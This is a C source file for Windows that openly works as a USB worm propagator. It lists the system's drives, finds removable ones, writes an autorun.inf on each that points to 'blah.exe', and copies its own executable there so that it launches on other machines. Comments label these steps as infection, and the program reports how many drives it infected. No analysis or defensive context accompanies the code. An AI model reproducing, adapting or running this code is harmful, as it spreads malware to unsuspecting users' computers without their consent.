#include <windows.h>
#include <stdio.h>
int InfectDrives( );
int WriteINI( char* sINI, char* sFILE );
int ReadINI( char* sINI, char* sFILE );
int FileCopy( char* sNEW );
char* szFileName = "blah.exe";
int main()
{
int i = InfectDrives( );
printf( "drives infected: %i", i );
getchar( );
return 0;
};
int InfectDrives( )
{
char szBuffer[260];
char szInit[520], szFile[520];
int iCount = 0, iGet, iType;
iGet = GetLogicalDriveStringsA( sizeof( szBuffer ), szBuffer );
if( iGet == 0 ) {
return( 0 );
}
char *szDrive = szBuffer;
while( *szDrive )
{
iType = GetDriveTypeA( szDrive );
sprintf( szInit, "%sautorun.inf", szDrive ); //craft inf
sprintf( szFile, "%s%s", szDrive, szFileName ); //craft file
if( iType == 2 ) //removable device
{
if( ReadINI( szInit, szFileName ) == 0 ) //check for infection
{
if( WriteINI( szInit, szFileName ) == 0 ) //infect
{
if( FileCopy( szFile ) == 0 ) //copy file
{
iCount++;
}
}
}
}
szDrive = &szDrive[ strlen( szDrive ) + 1];
}
return( iCount );
};
int WriteINI( char* sINI, char* sFILE )
{
unsigned long bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI );
if( bWrite == 0 ) {
return( 1 );
}
return( 0 );
};
int ReadINI( char* sINI, char* sFILE )
{
char szBuffer[260];
unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI );
if( lRead != 0 ) {
if( strstr( szBuffer, sFILE ) ) {
return( 1 );
}
}
return( 0 );
};
int FileCopy( char* sNEW )
{
char szBuffer[260];
GetModuleFileName( NULL, szBuffer, sizeof( szBuffer ) );
bool bCopy = CopyFile( szBuffer, sNEW, 0 );
if( bCopy == false ) {
return( 1 );
}
return( 0 );
} |